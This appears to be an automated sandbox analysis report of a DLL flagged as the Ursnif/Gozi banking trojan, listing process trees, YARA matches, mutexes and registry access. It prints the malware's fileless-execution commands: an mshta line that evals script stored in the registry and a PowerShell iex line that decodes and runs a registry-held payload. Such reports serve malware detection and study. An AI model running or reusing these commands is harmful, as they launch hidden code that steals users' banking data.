Source: C:\Windows\System32\control.exe Code function: 39_2_008846EC NtAllocateVirtualMemory, 39_2_008846EC
Source: C:\Windows\System32\control.exe Code function: 39_2_008A1004 NtProtectVirtualMemory,NtProtectVirtualMemory, 39_2_008A1004
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A71CB8 CreateProcessAsUserA, 1_2_00A71CB8
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A648AD 1_2_00A648AD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5D0DC 1_2_00A5D0DC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A54C03 1_2_00A54C03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6D057 1_2_00A6D057
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6ED4B 1_2_00A6ED4B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A73EAF 1_2_00A73EAF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A562FA 1_2_00A562FA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6D7BD 1_2_00A6D7BD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5E384 1_2_00A5E384
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A68BF3 1_2_00A68BF3
Source: C:\Windows\explorer.exe Code function: 38_2_03B793FC 38_2_03B793FC
Source: C:\Windows\explorer.exe Code function: 38_2_03B74B78 38_2_03B74B78
Source: C:\Windows\explorer.exe Code function: 38_2_03B5DA3C 38_2_03B5DA3C
Source: C:\Windows\explorer.exe Code function: 38_2_03B6AA28 38_2_03B6AA28
Source: C:\Windows\explorer.exe Code function: 38_2_03B5B9E8 38_2_03B5B9E8
Source: C:\Windows\explorer.exe Code function: 38_2_03B569DC 38_2_03B569DC
Source: C:\Windows\explorer.exe Code function: 38_2_03B6D92C 38_2_03B6D92C
Source: C:\Windows\explorer.exe Code function: 38_2_03B6B814 38_2_03B6B814
Source: C:\Windows\explorer.exe Code function: 38_2_03B7A074 38_2_03B7A074
Source: C:\Windows\explorer.exe Code function: 38_2_03B5DF58 38_2_03B5DF58
Source: C:\Windows\explorer.exe Code function: 38_2_03B5ECE0 38_2_03B5ECE0
Source: C:\Windows\explorer.exe Code function: 38_2_03B75428 38_2_03B75428
Source: C:\Windows\explorer.exe Code function: 38_2_03B7A3B2 38_2_03B7A3B2
Source: C:\Windows\explorer.exe Code function: 38_2_03B703EC 38_2_03B703EC
Source: C:\Windows\explorer.exe Code function: 38_2_03B66B00 38_2_03B66B00
Source: C:\Windows\explorer.exe Code function: 38_2_03B6B378 38_2_03B6B378
Source: C:\Windows\explorer.exe Code function: 38_2_03B57B44 38_2_03B57B44
Source: C:\Windows\explorer.exe Code function: 38_2_03B5E2B0 38_2_03B5E2B0
Source: C:\Windows\explorer.exe Code function: 38_2_03B52A34 38_2_03B52A34
Source: C:\Windows\explorer.exe Code function: 38_2_03B59A34 38_2_03B59A34
Source: C:\Windows\explorer.exe Code function: 38_2_03B7E220 38_2_03B7E220
Source: C:\Windows\explorer.exe Code function: 38_2_03B67218 38_2_03B67218
Source: C:\Windows\explorer.exe Code function: 38_2_03B8027C 38_2_03B8027C
Source: C:\Windows\explorer.exe Code function: 38_2_03B76250 38_2_03B76250
Source: C:\Windows\explorer.exe Code function: 38_2_03B7EA40 38_2_03B7EA40
Source: C:\Windows\explorer.exe Code function: 38_2_03B719FC 38_2_03B719FC
Source: C:\Windows\explorer.exe Code function: 38_2_03B7A9FC 38_2_03B7A9FC
Source: C:\Windows\explorer.exe Code function: 38_2_03B699F8 38_2_03B699F8
Source: C:\Windows\explorer.exe Code function: 38_2_03B549C4 38_2_03B549C4
Source: C:\Windows\explorer.exe Code function: 38_2_03B5596C 38_2_03B5596C
Source: C:\Windows\explorer.exe Code function: 38_2_03B6A0F0 38_2_03B6A0F0
Source: C:\Windows\explorer.exe Code function: 38_2_03B6782C 38_2_03B6782C
Source: C:\Windows\explorer.exe Code function: 38_2_03B69850 38_2_03B69850
Source: C:\Windows\explorer.exe Code function: 38_2_03B6CE90 38_2_03B6CE90
Source: C:\Windows\explorer.exe Code function: 38_2_03B596D8 38_2_03B596D8
Source: C:\Windows\explorer.exe Code function: 38_2_03B80614 38_2_03B80614
Source: C:\Windows\explorer.exe Code function: 38_2_03B51600 38_2_03B51600
Source: C:\Windows\explorer.exe Code function: 38_2_03B625A4 38_2_03B625A4
Source: C:\Windows\explorer.exe Code function: 38_2_03B55DA8 38_2_03B55DA8
Source: C:\Windows\explorer.exe Code function: 38_2_03B68DD0 38_2_03B68DD0
Source: C:\Windows\explorer.exe Code function: 38_2_03B565D8 38_2_03B565D8
Source: C:\Windows\explorer.exe Code function: 38_2_03B675D8 38_2_03B675D8
Source: C:\Windows\explorer.exe Code function: 38_2_03B66528 38_2_03B66528
Source: C:\Windows\explorer.exe Code function: 38_2_03B7C560 38_2_03B7C560
Source: C:\Windows\explorer.exe Code function: 38_2_03B77D44 38_2_03B77D44
Source: C:\Windows\explorer.exe Code function: 38_2_03B5FCA0 38_2_03B5FCA0
Source: C:\Windows\explorer.exe Code function: 38_2_03B61C0C 38_2_03B61C0C
Source: C:\Windows\explorer.exe Code function: 38_2_03B9138C 38_2_03B9138C
Source: C:\Windows\System32\control.exe Code function: 39_2_008669DC 39_2_008669DC
Source: C:\Windows\System32\control.exe Code function: 39_2_00884B78 39_2_00884B78
Source: C:\Windows\System32\control.exe Code function: 39_2_00885428 39_2_00885428
Source: C:\Windows\System32\control.exe Code function: 39_2_0087A0F0 39_2_0087A0F0
Source: C:\Windows\System32\control.exe Code function: 39_2_0087B814 39_2_0087B814
Source: C:\Windows\System32\control.exe Code function: 39_2_0087782C 39_2_0087782C
Source: C:\Windows\System32\control.exe Code function: 39_2_00879850 39_2_00879850
Source: C:\Windows\System32\control.exe Code function: 39_2_0088A074 39_2_0088A074
Source: C:\Windows\System32\control.exe Code function: 39_2_008649C4 39_2_008649C4
Source: C:\Windows\System32\control.exe Code function: 39_2_0086B9E8 39_2_0086B9E8
Source: C:\Windows\System32\control.exe Code function: 39_2_008819FC 39_2_008819FC
Source: C:\Windows\System32\control.exe Code function: 39_2_0088A9FC 39_2_0088A9FC
Source: C:\Windows\System32\control.exe Code function: 39_2_008799F8 39_2_008799F8
Source: C:\Windows\System32\control.exe Code function: 39_2_0087D92C 39_2_0087D92C
Source: C:\Windows\System32\control.exe Code function: 39_2_0086596C 39_2_0086596C
Source: C:\Windows\System32\control.exe Code function: 39_2_00877218 39_2_00877218
Source: C:\Windows\System32\control.exe Code function: 39_2_0088E220 39_2_0088E220
Source: C:\Windows\System32\control.exe Code function: 39_2_0087AA28 39_2_0087AA28
Source: C:\Windows\System32\control.exe Code function: 39_2_00869A34 39_2_00869A34
Source: C:\Windows\System32\control.exe Code function: 39_2_00862A34 39_2_00862A34
Source: C:\Windows\System32\control.exe Code function: 39_2_0086DA3C 39_2_0086DA3C
Source: C:\Windows\System32\control.exe Code function: 39_2_0088EA40 39_2_0088EA40
Source: C:\Windows\System32\control.exe Code function: 39_2_00886250 39_2_00886250
Source: C:\Windows\System32\control.exe Code function: 39_2_0089027C 39_2_0089027C
Source: C:\Windows\System32\control.exe Code function: 39_2_0088A3B2 39_2_0088A3B2
Source: C:\Windows\System32\control.exe Code function: 39_2_008803EC 39_2_008803EC
Source: C:\Windows\System32\control.exe Code function: 39_2_008893FC 39_2_008893FC
Source: C:\Windows\System32\control.exe Code function: 39_2_00876B00 39_2_00876B00
Source: C:\Windows\System32\control.exe Code function: 39_2_00867B44 39_2_00867B44
Source: C:\Windows\System32\control.exe Code function: 39_2_0087B378 39_2_0087B378
Source: C:\Windows\System32\control.exe Code function: 39_2_0086FCA0 39_2_0086FCA0
Source: C:\Windows\System32\control.exe Code function: 39_2_0086ECE0 39_2_0086ECE0
Source: C:\Windows\System32\control.exe Code function: 39_2_00871C0C 39_2_00871C0C
Source: C:\Windows\System32\control.exe Code function: 39_2_008725A4 39_2_008725A4
Source: C:\Windows\System32\control.exe Code function: 39_2_00865DA8 39_2_00865DA8
Source: C:\Windows\System32\control.exe Code function: 39_2_00878DD0 39_2_00878DD0
Source: C:\Windows\System32\control.exe Code function: 39_2_008665D8 39_2_008665D8
Source: C:\Windows\System32\control.exe Code function: 39_2_008775D8 39_2_008775D8
Source: C:\Windows\System32\control.exe Code function: 39_2_00876528 39_2_00876528
Source: C:\Windows\System32\control.exe Code function: 39_2_00887D44 39_2_00887D44
Source: C:\Windows\System32\control.exe Code function: 39_2_0088C560 39_2_0088C560
Source: C:\Windows\System32\control.exe Code function: 39_2_0087CE90 39_2_0087CE90
Source: C:\Windows\System32\control.exe Code function: 39_2_008696D8 39_2_008696D8
Source: C:\Windows\System32\control.exe Code function: 39_2_00861600 39_2_00861600
Source: C:\Windows\System32\control.exe Code function: 39_2_00890614 39_2_00890614
Source: C:\Windows\System32\control.exe Code function: 39_2_0086DF58 39_2_0086DF58
PE file contains executable resources (Code or Archives)
Source: crypt_3300.dll Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file does not import any functions
Source: rgcvdt5c.dll.36.dr Static PE information: No import functions for PE file found
Source: czjkgrnh.dll.33.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: lz32.dll
Source: C:\Windows\explorer.exe Section loaded: cryptdlg.dll
Uses 32bit PE files
Source: crypt_3300.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: crypt_3300.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@34/149@17/2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5A7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 1_2_00A5A7B1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{66431C9B-5D28-11EB-90E5-ECF4BB570DC9}.dat
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{02250638-79A0-844F-1356-BDF8F7EA41AC}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{42812DF2-B9CF-C435-5396-FD38372A81EC}
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{FE1EA41C-45BA-E0E6-BF12-491463668D88}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF556AB8A7952C322B.TMP
Source: crypt_3300.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: crypt_3300.dll Virustotal: Detection: 7%
Source: regsvr32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\crypt_3300.dll'
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\crypt_3300.dll
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17422 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17428 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3F68.tmp' 'c:\Users\user\AppData\Local\Temp\czjkgrnh\CSCEF1F6125AF8B42719A491BF8DBE92E8.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES515A.tmp' 'c:\Users\user\AppData\Local\Temp\rgcvdt5c\CSC108898B256644579B55FCCE99117812A.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\crypt_3300.dll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:82962 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17422 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1460 CREDAT:17428 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3F68.tmp' 'c:\Users\user\AppData\Local\Temp\czjkgrnh\CSCEF1F6125AF8B42719A491BF8DBE92E8.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES515A.tmp' 'c:\Users\user\AppData\Local\Temp\rgcvdt5c\CSC108898B256644579B55FCCE99117812A.TMP'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: crypt_3300.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.440428591.000001FC308B0000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.449984223.00000241EFD80000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000026.00000000.477442156.000000000E420000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.463267415.00000000057E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.463267415.00000000057E0000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000026.00000000.477442156.000000000E420000.00000002.00000001.sdmp
Source: crypt_3300.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: crypt_3300.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: crypt_3300.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: crypt_3300.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: crypt_3300.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6FC77 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_00A6FC77
Registers a DLL
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\crypt_3300.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A77177 push ecx; ret 1_2_00A77187
Source: C:\Windows\explorer.exe Code function: 38_2_03B7C131 push 3B000001h; retf 38_2_03B7C136
Source: C:\Windows\System32\control.exe Code function: 39_2_0088C131 push 3B000001h; retf 39_2_0088C136
Source: initial sample Static PE information: section name: .text entropy: 7.02169145494

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.362515361.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362460411.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.456841690.0000000000470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362409571.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.398940574.0000000004C6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362501622.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362480640.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362433705.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
